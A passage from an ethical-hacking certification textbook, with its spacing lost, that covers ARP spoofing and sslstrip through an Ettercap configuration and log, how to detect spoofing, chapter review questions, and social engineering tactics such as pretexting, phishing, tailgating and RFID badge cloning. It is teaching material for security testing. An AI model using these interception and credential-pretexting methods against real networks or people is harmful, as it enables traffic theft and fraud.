Sniffing■/etc/ettercap/etter.conf#ifyouuseiptables:redir_command_on="iptables-­tnat-­APREROUTING-­i%iface-­ptcp-­-­dport%port-­jREDIRECT-­-­to-­port%rport"redir_command_off="iptables-­tnat-­DPREROUTING-­i%iface-­ptcp-­-­dport%port-­jREDIRECT-­-­to-­port%rport"Oncethat’sdone,thesslstripplug-­incanbeenabled.Itwillruntheiptablescommandtostarttheredirectsotheplug-­incanreceivethemessages.HereyoucanseethelogthatshowsthestartofsslstripinsideEttercap.RunningsslstripinEttercapHost192.168.86.1addedtoTARGET1ARPpoisoningvictims:GROUP1:192.168.86.118:D6:C7:7D:F4:8AGROUP2:ANY(allthehostsinthelist)Activatingsslstripplugin...SSLStripplugin:bind443on59273SSLStripPluginversion1.1isstillunderexperimentalmode.Pleasereportsanyissuestothedevelopmentteam.DHCP:[192.168.86.1]ACK:0.0.0.0255.255.255.0GW192.168.86.1DNS192.168.86.1"lan"Oncetheiptablesruleisinplace,sslstripshouldbecapturinganyHTTPStraffic.Again,though,thisassumesthattheHTTPSconnectionisusingaversionofSSLorTLSthatisvulnerabletothestrippingattack.Ifitisn’t,youwon’tgetanytraffic.SpoofingDetectionNetworkoperatorsandsecurityprofessionalsneedtobeabletodetectspoofingattacks.Agoodspoofingattackmaynotbedetectableattheuserlevel,whichmeansyouneedtobeabletodetecttheminthenetwork.Thismaycomefromusinganetworkintrusiondetectionsystem,butyoustillneedtoknowhowthosedetectionswouldwork.First,let’sstartwithanARPspoofingattack.Asyousaw,anARPspoofingattackreliesontheattackersendingoutalotofARPresponses.Auserwon’tbeabletoseethishappening,butanymonitoringofthenetworkwouldshowupallofthesegratuitousARPmessagesonthenetwork.ThiswillgiveyouthefactthattheARPspoofingishappening.ItwillalsogiveyoutheMACaddressofthespoofer.Summary 399Knowingalayer2addressisn’tgoingtotellyouverymuch.Afterall,mostpeoplearen’tgoingtobeabletoeasilylookata6-­byteMACaddressandknowimmediatelywhatsystemitbelongsto.First,youcantakethefirstthreebytesandlookthemupbecausethefirstthreebytesareanorganizationallyuniqueidentifier(OUI).UsinganOUIlookuptool,suchastheoneavailableatwireshark.org,willgiveyouthemanufacturerofthenetworkcardtheMACaddressbelongsto.Asanexample,theMACaddressofasystemonmynetworkis70:4d:7b:6d:52:6a.PerforminganOUIlookuprevealsthatthemanufacturerisASUSTek.ThisisbecausethenetworkinterfaceisonamotherboardmanufacturedbyASUS.TheMACaddressaloneisn’tsufficient,especiallyifallthecomputersonyournetworkcomefromthesamemanufacturer.Allyouknowisthemanufacturerandalotofcompanieswillbuyalltheircomputersystemsfromasinglemanufacturerorevenacoupleofmanufacturers.YoumayneedtosearchyournetworkfortheMACaddress.YourswitcheswillalwayshaveamappingofMACaddresstoportnumber.OnceyouhavefoundwhichswitchtheMACaddressisconnectedto,youcanfindtheportandidentifywhatsystemtheportisconnectedto.Itcantakealittlechasing,especiallyiftheportdoesn’tdirectlyconnecttoasystembutinsteadanunmanagedport.Ataminimum,youcanchasethecablefromtheswitchportorthejacktheswitchportconnectsto.Youmayneedtoidentifyspoofingatthenetworklayer,meaningspoofingtheIPaddress.Thismaybeespeciallytrueinthecaseofdenial-­of-­serviceattacks.Thisshouldbehandledbyyourrouter.Yourrouter,ifit’sconfiguredtodoso,canperformsomethingcalledreversepathverification.Thisisslightlylessusefulifyouhaveonlyasingleconnectionpointonyourrouter.Reversepathverificationworksbyperformingalookupintheroutingtable.Theroutertakesthesourceaddressfromapacketandcheckstheroutingtabletodeterminewhichinterfacearesponsepacketwouldgoouton.Iftheinterfacethemessagecomesinonisdifferent,thereisachancethepackethasbeenspoofed.DNSspoofingmaybehardertodetect,especiallyiftheattackerisusinganothermechanismtocapturetheoutboundDNSrequest.IftheIPaddressoftheoutboundmessagematchestheaddressontheinboundmessage,youmaybesafe.Ifthetwoaddressesdon’tmatch,youmaybesafe.Yes,thatdoesn’tmakealotofsense.TheproblemwithDNSisyoumayendupgettingaresponsefromadifferentaddress,dependingonhowtheDNSserverisconfigured.AbetterapproachwithDNSistouselocalDNSserversandconfigurethoseDNSserverstouseTCPratherthanUDP.Thethree-­wayhandshakeofTCPwillprotectyoufromspoofing,oratleastdoamuchbetterjobofprotectingyouagainstspoofingthanUDPdoes.YoucanalsomakesureyourlocalDNSserversareconfiguredtouseDNSSecurityExtensions(DNSSEC).Thiswillusecryptographicverificationofserversyouarecommunicatingwith.SummarySniffingcanbeanimportantskilltohavebecauseofthemanytacticsthatcanrelyoninformationthatcanbegatheredfromsniffing.Sniffingisanotherwordforcapturingpackets,whichistheprocessofgatheringallmessagesthatpassbythenetworkinterface,400 Chapter9  Sniffing■grabbingthemattheDataLinklayer,andpassingallthemessagesuptoanapplicationthatiscapableofdisplayingthemessagescaptured.Whileit’scalledpacketcapturing,it’sreallyframesthatarebeinggrabbedsincethedataisbeinggrabbedattheDataLinklayerwiththelayer2headersintact.Theprotocoldataunit(PDU)atlayer2isaframe.ThePDUatlayer3isapacket.Ifthepacket-­capturesoftwareisdiscardingthelayer2 information,thenitreallyisapacketcapture.Thereisalotofsoftwarethatcanbeusedtocapturepacketsacrossvariedplatforms.Theprogramtcpdumphasbeenaroundsincethelate1980sandwasstandardizedinthelate1990s.Itisgenerallyavailableacrossmultipleoperatingsystems,butespeciallyUnix-­likeoperatingsystems.OnWindows,youcangetaportoftcpdumpcalledwindump.Thebehavioristhesame,butthesourcecodeisdifferentinordertotakeintoaccountthewayWindowsinteractswithitsnetworkhardware.Ifyouarelookingforaprogramyoucanusewiththesamenameacrossmultipleplatforms,youcanusetshark.Thisisacommand-­lineprogramthatcomeswiththeWiresharkpackage.Italsohastheadvantageofgivingyouthecapabilityofprintingonlythefieldsyouindicate.WiresharkisaGUI-­basedprogramthatcanperformnotonlypacketcapturebutalsopacketanalysis.Theremaybeotherprogramsandutilitiesyoucanusetoanalyzepacketcaptures,butWiresharkhastobeaboutthebestyoucanget,especiallyforthemoney.It’sfreelyavailableandpackedwithfunctionality.Wiresharkknowsaboutdozensifnothundredsofprotocols.Itdoesprotocoldecodingandcanidentifyissueswithprotocols.Itwillcallattentiontothoseissuesbycoloringtheframesinthepacketcaptureandalsocoloringthelinesintheprotocoldecode.WiresharkwillprovideexpertinformationthatyoucanlookatallatoncefromtheAnalyzemenu.ThereisalsoaStatisticsmenuthatprovidesanumberofdifferentwaystolookatthedata.Thisincludesaprotocolhierarchy,showinghowtheprotocolsbreakdowninthepacketcapture.Youcanalsolookatthepacketcapturefromtheperspectiveofendpoints.Inthedifferentstatisticsviews,youcanseepacketandbytecounts.Itcanbechallengingtogetpacketstothedevicewhereyouaretryingtocapturethem.Onewaytodothisistomirrorportsonaswitch.Thisissometimescalledportspanningbecause,asmentionedpreviously,CiscocallsthefunctionalitySPAN.Youmaynothaveaccesstotheswitch,though.Youcanalsoperformspoofingattacks,suchasARPspoofing.ARPspoofingiswhenasystemsendsgratuitousARPresponses,whicharethencachedonothersystemsonthenetwork.ARPspoofingcanbeusedtogetpacketstoyoursystemforcapture.However,youcanalsouseARPspoofingasastartingpointtodoDNSspoofingifwhatyoureallywanttodoisredirectrequeststootherIPaddresses.YoucanalsouseARPspoofingtoredirectwebrequeststothesslstripplug-­in.TheprogramthatdoesallthisisEttercap,thoughthereareotherprogramsthatcandoARPspoofing.DNSspoofingisalsoapossiblewaytoredirecttraffictoanattacker.ThismaybedonebyinterceptingDNSrequestsandrespondingtothemfasterthanthelegitimateDNSserver.InthecaseofDNS,firsttoanswerwins,andsometimesDNSclientswillacceptanswersevenfromIPaddressesthatdon’toriginatetherequestbecauseDNSserversmaysometimesrespondonadifferentIPaddressthantheonetheresponsecameinon.Summary 401Spoofingdetectioncanbetime-­consuming.YoumayneedtochaseMACaddressesbackthroughswitchportsinordertofindthesystemthatownsthatMACaddress.WhenitcomestoidentifyingspoofedIPaddresses,youcouldusereversepathverificationtochecktheroutingtableforthecorrectinterfaceamessageshouldcomeinon.Thisismoreeffectiveinlargernetworkswhereroutershavemultipleinterfaces.Insomecases,it’sbettertoprotectthenetworkcommunicationagainstspoofingattacks.ThismaybethecaseforspoofingattacksonDNS,forinstance.UsinglocalDNSservers,TCP,andDNSSECcanhelpprotectDNScommunications.402 Chapter9  Sniffing■ReviewQuestionsYoucanfindtheanswersintheappendix.1.WhichhardwarevendorusesthetermSPANonswitches?A.HPB.3COMC.CiscoD.Juniper2.Ifyousawthefollowingcommandline,whatwouldyoubecapturing?tcpdump-­ieth2host192.168.10.5A.Trafficjustfrom192.168.10.5B.Traffictoandfrom192.168.10.5C.Trafficjustto192.168.10.5D.Alltrafficotherthanfrom192.168.86.53.Inthefollowingpacket,whatportisthesourceport?20:45:55.272087IPyazpistachio.lan.62882>loft.lan.afs3-­fileserver:Flags[P.],seq915235445:915235528,ack3437317287,win2048,options[nop,nop,TSval1310611430ecr1794010423],length83A.lanB.fileserverC.yazpistachioD.628824.Whatisonedownsidetorunningadefaulttcpdumpwithoutanyparameters?A.DNSrequestsB.NotenoughinformationC.Sequencenumbersdon’tshowD.tcpdumpnotrunningwithoutadditionalparameters5.AtwhichprotocollayerdoestheBerkeleyPacketFilteroperate?A.InternetworkB.TransportC.DataLinkD.ProtocolReviewQuestions 4036.WhatdowecallanARPresponsewithoutacorrespondingARPrequest?A.Is-­atresponseB.Who-­hasARPC.GratuitousARPD.IPresponse7.WhichfunctionalityinWiresharkwillprovideyouwithpercentagesforeveryprotocolinthepacketcapture,orderedbyprotocollayers?A.ConversationsB.EndpointsC.ProtocolhierarchyD.Statisticsview8.Whichprogramwouldyouuseifyouwantedtoonlyprintspecificfieldsfromthecapturedpacket?A.fielddumpB.tcpdumpC.wiredumpD.tshark9.Thefollowingshowsatimestamp.Whatdoesthetimeofthismessagereflect?63041.897644NOTIFY*HTTP/1.1192.168.86.210239.255.255.250SSDP[ETHERNETFRAMECHECKSEQUENCEINCORRECT]750A.Thetimesince1970.B.Thetimeofday.C.Thetimesincepacketstart.D.Thereisnotimeinthesummary.10.Whatprotocolisbeingusedintheframelistedinthissummary?71942.691135157.240.19.26192.168.86.26TCP1464→61618[ACK]Seq=4361Ack=1276Win=31232Len=1398TSval=3725556941TSecr=1266252437[TCPsegmentofareassembledPDU]A.TLSB.UDPC.IPD.TCP443404 Chapter9  Sniffing■11.Whatprogramcouldbeusedtoperformspoofingattacksandalsosupportsplug-­ins?A.arpspoofB.fragrouteC.EttercapD.sslstrip12.WhatwouldyouneedtodobeforeyoucouldperformaDNSspoofattack?A.SetupaportspanB.StartupWiresharkC.ARPspoofD.Configuresslstrip13.Whichcommand-­lineparameterwouldyouusetodisablenameresolutionsintcpdump?A.-­nB.-­iC.-­rD.-­x14.Whymightyouhavemoreendpointsshownatlayer4thanatlayer2?A.Layer4 multiplexeslayer2.B.Systemsmayinitiatemultipleconnectionstothesamehost.C.PortsaremorenumerousthanMACaddresses.D.TheIPaddressesdictatetheendpoints.15.Whatwouldyouusesslstripfor?A.GettingplaintexttrafficB.RemovingallSSLrequestsC.ConvertingSSLtoTLSD.ConvertingTLStoSSL16.Whymightyouhaveproblemswithsslstrip?A.sslstripisdeprecated.B.sslstripdoesn’tworkwithnewerversionsofTLS.C.sslstripdoesn’tsupportTLS.D.sslstripworksonlywithEttercap.ReviewQuestions 17.Whatdoesthefollowinglinemean?Sequencenumber:4361(relativesequencenumber)A.Thesequencenumbershownisnottherealsequencenumber.B.Thesequencenumbershownhasnotbeenincremented.C.Thesequencenumbershownisn’tlongenough.D.Thesequencenumbershownistheacknowledgmentnumber.18.Whatcanyousayabout[TCPSegmentLen:35],asprovidedbyWireshark?A.Thewindowsizehaschanged.B.Wiresharkhasinferredthisinformation.C.Wiresharkextractedthisfromoneoftheheaders.D.Wiresharkhasadditionaldetailbelow.19.Whatproblemdoesportspanningovercome?A.Switchesdon’tsupportlayer3.B.Switchesaggregateports.C.Switchesfiltertraffic.D.Switchesareunreliable.20.Whatisthe/etc/ettercap/etter.dnsfileusedfor?A.EnablingfirewallrulesforEttercapB.ConfiguringhostnamestoIPaddressesC.SettingupmailforEttercapD.DisablingARPspoofinginEttercap405Chapter10SocialEngineeringTHEFOLLOWINGCEHEXAMTOPICSARECOVEREDINTHISCHAPTER:✓✓Socialengineering✓✓Physicalsecurity✓✓Verificationprocedures✓✓BiometricsAtthetimethisisbeingwritten,about80percentofattacksarethoughttoinvolvesocialengineeringofsomesort.Thismakeslearningaboutsocialengineeringsignificant.Iftheattackersareusingit,youshouldbeusingittoo.Ultimately,socialengineeringattacksaregoingtobeveryeffectiveavenuesintoanetworksoyoucancontinuetoperformtesting.Thiswouldbeespeciallytruewhenitcomestoredteaming,whereyouarelikelytohavethecuffstakenoff,asitwere,andyouhavemorelatitudeinyourtactics.Youmaybefamiliarwithsomebasicsocialengineeringstrategieslikephishing,simplybecauseit’ssocommon.Socialengineeringisn’tjustaboutsendingemails,though.Thereareothersocialengineeringstrategies.Ultimately,anymeansofmanipulatingsomeonetodosomethingtheyshouldn’torwouldn’totherwisedoissocialengineering.Socialengineeringbringsinalotofpsychologyandelementsofhumannature,soessentiallyyouareusingthewaypeopleareagainstthem.Beyondthebasicsofsocialengineering,includinghowandwhyitworks,thereisalsosocialengineeringoutsidethevirtualworld.Askilledsocialengineercangetalotofpeopletodowhattheengineerwantsthemtodo.Inthedigitalspace,thereisphishing,ofcourse,butevenphishingcanmakeuseofotherelements,includingroguewebsites.Roguewebsitesmaybeusedevenwithoutthephishingcomponent,andtheyarecalledroguebecauseeithertheyarecontrolledbyanattackerortheremaybemalwareinstalledbyanattackerwithinalegitimatewebsite.Speakingofrogue,anattackermaycreatearoguewirelessaccesspoint.Thiswouldbedonetolurepeopletoconnecttowhattheybelieveisatrustedwirelessnetwork.Creatingroguenetworks,aswellasotheraspectsofsocialengineering,canbeautomatedtotakethetimeoutofsettingthemup.We’llcoverallofthisoverthecourseofthischapter.SocialEngineeringSocialengineering,regardlessofwhatitwascalledorhowitwasthoughtof,hasbeenaroundprobablyaslongashumanshavebeenaround.Youmaycallitmanipulationifyoulike,butintheinformationsecuritycommunity,it’scalledsocialengineering.Theobjectiveistoconvinceormanipulatesomeoneintodoingsomethingtheywouldn’tnormallydoforsomeonetheydon’tknow.Thereareanumberoftechniquesfordoingthat.Theyaregenerallyconsideredtoberelatedtothescienceofinfluence.RobertCialdiniproposedsixprinciplesaspartofhistheoryofinfluence.Theyareasfollows,andunderstandingtheseprinciplesmayhelpyoustarttounderstandhowtoinfluenceormanipulatepeople:SocialEngineering 409Reciprocity Peoplewillgenerallyfeelliketheywanttoormaybeobligatedtorespondtoakindnessorfavor.Youmayfeelthiswayifacompanygivesawayfreesamples.Ifyougetoneofthesefreesamples,youmaybeinclinedtofeellikeyoushouldbuytheproductinresponse.Commitment Ifsomeonecommitstosomething,eitherinwritingororally,theyaremoreinclinedtofollowthroughonthatcommitment.SocialProof Thinkaboutsocialproofaspeerinfluence.Ifyouseesomeoneelsedoingsomething,suchasusingaproduct,youwillseethatitisacceptabletodothat.Youmaythereforebemorewillingtotrytheproduct,orwhateveritisyou’veseen.Authority Ifyou’veeverbeenpulledoverbythepolice,youcanrecognizethisone.Evenifyouhaven’t,youmaythinkbacktobeingatschool.Ingeneral,peopleareinclinedtofollowauthorityfiguresanddowhattheysayorask.Liking Ifyoulikesomeone,youmaybemoreeasilyswayedbywhattheythinkordo.Scarcity Thisiseasytorecognize.ThinkaboutCabbagePatchKids,ifyougobackthatfar,andalsomanyoftheproductrolloutsbyApple.Thelackofavailabilityoftheseproductsincreasestheirperceivedvalue.Theperceptionofincreasedvaluemakesthemmoredesirable.Manyofthesegobacktotheearlyoriginsofhumanity.Thinkaboutsocialproofasanexample.Ifyouweretoseeyourneighboreatingsomethingandthennotdying,youwouldbemoreinclinedtoeatthatthingyourself.Youhaveproofthatit’ssafe.Similarly,humanshavelongreliedononeanothertosurvive.Ifyourneighbordoessomethingforyou,youwoulddosomethingforthembecausethatishowcommunitieswork.Essentially,thesearedeep-­seatedmodesofbehavingbecauseofthewayourbrainsandneurochemistrywork.Wearewiredtobesusceptibletosocialengineeringandscamsbecausefromanevolutionarystandpointweneededoneanothertosurvive,sotrustisimportant.Oftentheprimaryobjectiveofsocialengineeringisinformation.Thismeanstheattackeristryingtogetsomeonetoprovideinformationtheyshouldn’tbeproviding.Itmaybesomethinglikeausernameandpassword.Itmaybeotherpersonalinformation,likeaSocialSecuritynumberoracreditcardnumber.Certainly,informationisnottheonlyreasontousesocialengineering.Youmaywanttogetsomeonetovisitawebsite,whereyouhaveanotherattackwaiting.Youcouldalsogetsomeonetoopenanemail.ThinkabouttheILoveYouvirus.Avirusrequiresuserinterventiontospreadfromsystemtosystem.ILoveYoumadeuseofavulnerabilityinanemailclient,allowingthevirustousetheaddressbooktosendmessagestoallthecontacts.Beforetheviruscouldrun,though,someonehadtobeconvincedtoopentheemailandthenrunthescriptthatwascontainedinthemessage.Thesubjectline,asyoucanseeinFigure 10.1,wasILOVEYOU.Imaginegettinganemailfromsomeoneyouknowwiththatsubjectline.You’reprobablygoingtoopenthemessage.Themessagedirectsyoutoopentheattached“text”file.Infact,thisisanotheraspectofsocialengineering.Windowssystemshidefilenameextensionsforknownfiletypes.WhatyouseeinthemessageisLOVE-­LETTER-­FOR-­YOU.txt,wheninfacttheactualfilenameextensionis.vbs.It’sjusthiddensoyouthinkit’satextfile.410 Chapter10  SocialEngineering■FIGURE 10.1 ILoveYouvirusTherearesomanyexamplesofsocialengineering,andyouprobablyseemanyonaregularbasis.Whenitcomestosocialengineering,though,it’sprobablybesttobepreparedandthinkaboutyoursituationandnotexpecttojustflybytheseatofyourpants.PretextingApretextisanexcusetodosomethingorsaysomething,andinthecontextofsocialengineering,apretextisthestoryyouhavegeneratedtoexplainthecontact.Theuseofapretexttoperformsocialengineeringattacksiscalledpretexting.Thisisessentiallythescriptyouwillbefollowing.It’swhereyouwouldbespendingafairamountoftime,soyouneedtohaveaclearunderstandingofhowbesttogetwhatyouarelookingfor.Youstartwithwhatitisyouarelookingtogetfromyourvictimssincethatwillbethebasisofyourstory.Forinstance,ifyouarelookingforsomeone’scorporatecredentials,youwouldn’tcallthemsayingyouwerefromtheirbank.Thestoryreallyneedstofitthecircumstance.Onceyouhaveanunderstandingofwhatitisyouarelookingfor,youcanstarttocreateyourscenario.Youshouldthinkabouthowto“hook”thepersonsotheyareinclinedtoengagewithyou.Whilethiswassupposedlyalegitimatecontact,here’sanexampleofawaytogetsomeonetoengage.Howeffectiveitmightbeisdebatable.Recently,IreceivedaphonecallfromsomeoneaskingforAaron.WhenIsaidhehadawrongnumber,hesaidhedidn’tbutthatIcouldhelp.ThoughIhungupatthatpoint,it’slikelyitwasacalltoaskfordonationstosomecharitylikethePoliceOfficersFoundation,astheapproachissimilartoonesI’vereceivedfromthem.Thisalsodemonstratestheimportanceofyourstoryandscript.RatherthanstumblingwhenIsaidtherewasnooneherebythatname,hehadananswerwithouthesitation.Thesesortsofcalls,bytheway,bringintheconceptofcommitment.Theycold-­callandthenkeepafteryouuntilyousayyouwillcommittogivingthemmoney.TheyknowthatSocialEngineering 411iftheyjustsendyousomethinginthemailsoyoucanthinkaboutit,youwon’tfollowthrough.Ifyouhavetoldthemyouwillfollowthroughbygivingmoneytotheircause,youwilllikelyfollowthrough.Keepinmindtheprinciplesofsocialengineeringasyouaredevelopingyourstory.Ifyouaretryingtogetsomeonetogiveuptheirinformation,doingthemafavororatleastappearingtodothemafavorcanmakethemfeelindebtedtoyou.Youmaycall,forinstance,sayingyouarefromthecompany’shelpdeskandyounoticedalotofbogusattemptstologintoyourtarget’saccount.Youwereconcernedaboutthemandtheirpersonalinformationsincecreditcardtheftissoprevalent,nottomentionanyotherdatathatmaybestoredontheirsystem.Theywillbegratefulforthefavoryoudidthem,appearingtoprotecttheirinterests.Then,youcanoffertogettheirpasswordconfirmedorevenchanged.Ifyoumakethemalittleafraid,youmaybeabletoalsoshort-­circuitanynaturalsuspicion.Ifyouarelookingforsomegoodstoriesabouthowtoworkasocialengineeringattack,findsomeofthestoriesbyKevinMitnick,whohaslongbeenconsideredamasterofsocialengineering.YouwilllikelyhaveatleastheardofpeoplegettingphonecallsfromtheIRSorfromthepolice.Youaregoingtobearrestedifyoudon’tcallbackimmediatelyandcometoanarrangement.Thisisusingtheperceptionofauthorityagainstyou.You’reexpectedtofollowthedirectionsoftheauthority.Ifyou’veeverreceivedoneofthesephonecalls,notethetoneofvoiceused.It’sveryseriousandauthoritative.Thestoryaboutyoubeingarrestedunlessyouarrangeapaymenttocovercostsorfinesorwhatevertheyuseastheirpretextiscompletelybogus.However,theyarelookingtoappealtoyourtendencytofollowauthority.Similarly,whenyoureceiveemailfromFedExorAmericanExpressorChaseoranyotherlegitimatecompany,theemailisn’tjustplaintext.It’scompletewiththereallogo.Italsoprobablyusesthesamefontyoumightexpectifyouweretogetemailfromthosecompanies.Itlookslegitimate,orauthoritative.Becauseitlookscorrectandbecausetheyarelikelyofferingupsomethingyouwant,theyexpectyouwillignoretheactualURL(sinceit’shiddenbytheemailclientanyway,asageneralrule)andclickthelink.Atthatpoint,youwillbetakentoaroguewebsite.FYIAoncecommonsocialengineeringattackwasa419scam.ThisisalsoreferredtoastheNigerianPrincescam,andthe419referstothesectionoftheNigeriancriminalcode.Thisscamissimilartoascamfromthe18thcentury,whichisareminderofhowlongsocialengineeringhasbeenusedtomanipulatepeopleforcriminalpurposes.The419scamasksforanadvancefeewiththepromiseofenormousrichesonthebackend.Obviously,oncetheconfidenceartistgetstheadvancefeefromthevictim,theymoveon.412 Chapter10  SocialEngineering■Therearemanywaystogetsomeonetobelieveyourstoryandalsomanypotentialoutcomesfromasocialengineeringattack.Theimportantthing,ifyouwanttobesuccessful,istogetyourpretextingdonesoyouhaveyourstorytogether.Thiswillallowyoutobeabletohandleanysituationthatmayariseifyouareactuallytalkingtosomeone.Itwillalsohelpyoutoget alltheartifactscorrectifyouareusingadigitalattack.SocialEngineeringVectorsOnceyoustartfactoringinallthedifferentpretextsyoucoulduse,therearecountlesswaystogettosomeoneandwhateveryouarelookingtogetfromthem.However,whenitcomesdowntoit,therearereallyfourvectorsthatareusedforsocialengineering.Theyareasfollows:Phishing Thewordphishingisbasedontheideaoffishing,meaningyouaredanglingsomesortofbaitouttogetinformation.Decadesago,thetermphreakwasusedtotalkaboutsomeonewhowasproficientatmanipulatingthephonenetwork.Byextension,thewordfishingwasmangledtocreatetheexpressionphishing.Phishingisatechniqueusedtoacquireinformationthroughdeceptionusingelectroniccommunications.Youmightexpecttoseephishingattemptsthroughemailorinstantmessaging.Youcouldalsoseeitusedthroughsocialnetworkingplatforms.Vishing Voicephishing,orvishing,isacommonapproach.Thisisusingphonecallstophishforinformation.Avishingattackcouldalsobeusedforreconnaissance.Youmightusevishingtoacquireinformationaboutyourtarget.Smishing Thisisphishingwithshortmessageservice(SMS)messages.Youmayreceivetextmessagesfromnumbersyoudon’tknow,perhapswithalinkinthemessage.Intheageofsmartphones,it’seasyforatargettotouchthelinkandbetakentothewebsite.Impersonation Thisisacommonapproachandonewe’vecertainlydiscussedearlier.Inthiscase,it’sconsideredtobemoreofaphysicalvector,whereyouaretryingtogainaccesstoabuildingorfacilitybypretendingtobesomeoneelse.Impersonationisultimatelyamajorcomponentofmanyofthesocialengineeringattacks.Impersonationattackscanalsobethroughwebsitesinthatusersbelievetheyarevisitingonesitewheninfacttheyarevisitinganother.Thesearejustahandfulofattackvectors.Mostofthemarebasedonmeansofcommunication,butoneofthemisbasedonaprimarilyphysicalmechanism—­pretendingtobesomeoneorsomethingyouaren’t.PhysicalSocialEngineering 413PhysicalSocialEngineeringNotallinformationisdigital.Notalltargetsexistinthedigitalrealm.Inreality,theeasiestpathintoanorganizationisgoingtobethroughpeople.Thatcontinuestobeshownthroughanynumberofattacksoveryears,ifnotdecades.Sometimes,thebestwaytogetthroughpeopleistoengagethemphysically.Thiscouldbethroughtheuseofvoice,asinavishingattack.Itcouldsimplybeshowingupsomewhereandtryingtogainentrancetoafacility.Youcanperformalotofreconnaissanceusingaphysicalvector.Gainingaccesstoafacilitymeansyoucouldseepeople’sdesktopsorwhiteboards.Alotofuserscanbepronetowritingdowninformationtheybelieveisimportant.This,yes,sometimesincludespasswords.Incaseswherepasswordpoliciesareonerous,theydon’ttakeintoaccounthowhardrememberingpasswordscanbe,andsomeuserswillsimplybeincapableofkeepingtrackoftheirpasswordsandresorttowritingthemdowntoremindthem.Physicalaccessisalsothebestkindofaccesswhenitcomestocomputersystems.Ifyoucangettoasystem,youmayfinditunlocked.It’salsopossibletobootoffremovablemediatograbpasswordsorchangethem.Thisisnottosaythatgettingaccesstoafacilitywillbeeasy.Thereareanumberofsecuritymeasuresthatarelikelytobeinplacetopreventthat.BadgeAccessBadgeaccessisacommonapproachtorestrictingaccesstothosewhoareauthorized.Whatitmeansisemployeesandotherswhohavebeenauthorizedareprovidedwithabadge.YoucanseeanexampleofabadgeinFigure 10.2.Thebadgewillgenerallyhavearadiofrequencyidentification(RFID)devicethatcanbereadbybadgereaders.ThereaderisconnectedtoasystemthatcancheckwhetheryourRFIDdevice,andbyextensionyou,hasbeenauthorized.Ifyourcardhasbeenauthorized,thereadersendsasignaltounlockorreleasethedoor—­afairlysimpleprocessthatiswidelyused.FIGURE 10.2 RFID-­basedbadge414 Chapter10  SocialEngineering■Thereareproblemswiththisapproach,though,meaningyoucanbypassthesedoor-­lockingdevicestoallowyoutogainaccesstoabuilding.First,thereistailgating,alsocalledpiggybacking.Ifyouwaitaroundanentrydoor,especiallyaboutthetimeemployeeswouldcommonlybegoingintothebuilding,youcouldwaituntilsomeoneelserantheirbadgeandunlockedthedoor.Youwouldthenjustfollowthemintothebuilding.Thisdoesn’tmeanyouwouldhaveunrestrictedaccesstoeverywhere.Manyfacilitieswillplacebadgereadersoninsidedoorsinadditiontotheoutsidedoors.Iftheyareallowingmultiplepeoplethroughtheoutsidedoor,though,thereisagoodchanceyoucouldstilljustusethetailgateoptionagaintowhateverpartofthebuildingyouneededtogetaccessto.Employeesareofteneducatedaboutbadgeaccessandtailgating.However,youwillfindemployeeswhoarereluctanttochallengesomeoneelsetoseeiftheyhaveabadge.Ideallythat’stheprocedurewhensomeonetriestotailgate,thoughitdoesn’toftenhappeninmyexperience.Somecompaniesmaysuggestyouallowthetailgatingandthencallphysicalsecuritytodealwithit,underthepremisethatifsomeoneistryingtogainaccesstothebuildingformaliciouspurposes,theymayputtheemployee’sphysicalsafetyindangeriftheemployeechallengestheiraccess.AnotherapproachtobadgeaccessistocloneanRFIDcard.TheRFIDtagisjustaverysmalldevicethatcanrespondtoaqueryfromanotherdevice.Therearedifferentcombinationsofactiveandpassiveinteractionbetweenthetagandthereader,butultimately,theyworkonradiofrequencywavesoperatinginthe125 kHzor13.5 MHzrange.Tocloneone,allyouneedtodoisreadtheidentifieroffthebadgeordeviceyouwanttocloneandreplicateitintothenewbadge,card,orotherdeviceyouareusing.Italsomaybepossibletocloneadeviceusingthenear-­fieldcommunication(NFC)technologyinyourphone.Infact,somehotelsarestartingtomakeuseofthattechnologytoallowyoutouseyourphonetounlockdoors.Whilethisisn’tnecessarilyaveryexpensiveendeavor,itmaybeeasiertosimplygetyourhandsonsomeone’scardtomakeuseofitforawhile.Oneadvantagetothisisthateventhoughphotosaregenerallyonthesebadges,thoughnotalways,mostpeoplewon’tnoticeaphoto,norwilltheyasktoseethebadgecloseenoughtolookatit.It’salsoeasytowalkaroundwiththebadgeturnedaroundsothereisnonameorphotoshowing.Thishappensregularlywiththebeltclipsthathavereelstoholdthebadge.Justbythenatureofthedevice,it’seasyforthebadgetospinsoitisbackward.Notallcompaniesputmuchinthewayofidentificationontheirbadges.It’scommontonotputthenameofthecompany.Theremaynotevenbetheemployee’sname.Sometimesyoumayfindthereisn’taphoto,makinguseofthebadgesignificantlyeasier.AcompanyIdidconsultingforseveralyearsagogaveoutcontractorbadges.ThesebadgeshadalargeConthemwherethephotowouldnormallygo.Obviously,withnonameandnophoto,howwouldanyonechallengetheuseofthisparticularbadge,aslongasitgrantedaccesstothebuilding?PhysicalSocialEngineering 415Sometimes,youwillfindthereisaguardinsidethebadgeaccessdoors.Theguardshouldbecheckingfortailgatingandalso,ideally,visuallyinspectingentrantstoseethattheyhavetheirbadges.Peoplearepeople,however,anditcanbeeasytoslipthroughagroupofpeopleunlesstheguardisforcingindividualinspectionofthebadge.Youjustwalkthroughasthoughyoubelongthereandassumetheguardwon’tnoticeyourlackofbadge.Theremaybeotherwaystogetaroundbadgeaccess,thoughthosearecommonones.Youwon’talwayshaveiteasy,though,whenitcomestogettinginwithabadge.Notallcompaniesjustallowthedoorstoswingopenandstayopenforaperiodoftime.ManTrapsAmantrapisadevicethatwillmakeitconsiderablyhardertogainentrancetoabuilding.Additionally,itwillmakeitmuchmoredangerousforyou.Ifthereisamantrap,youwillrunacrosstwodoorsseparatedbyashortspace.Onceyougainentrythroughthefirstdoor,youaretrappedinthatspaceuntiltheseconddoorisopened.Theseconddoorwouldlikelybeoperatedbyaguardwhomayperformsomesortofauthenticationchecklikeverifyingyouridentityagainstthenameandphotoonthebadgethatmayhaveallowedyouintothespacetobeginwith.Itbecomesmuchhardertogetthroughthanjustplainoldbadgeaccess.Thismaybeanareawherebadgecloningmaybeofsomehelp,unlesstheguardischeckingyourbadgeagainstanotherformofidentification.Thereareotherwaysofdoingsomethingsimilar—­onlyallowingasinglepersonthroughadoorwayatonetime.Youmayfindcaseswherethereisaturnstileorrevolvingdoorthatrestrictsaccessbasedonbadgeaccessoranotherformofauthentication.Turnstilescanbehopped,butafullyenclosedrevolvingdoorissomethingelsealtogether.Thisisaplacewhereyouwon’tbeabletotailgate.Onlyonepersonisallowedintotherevolvingdooratatime.Thereisc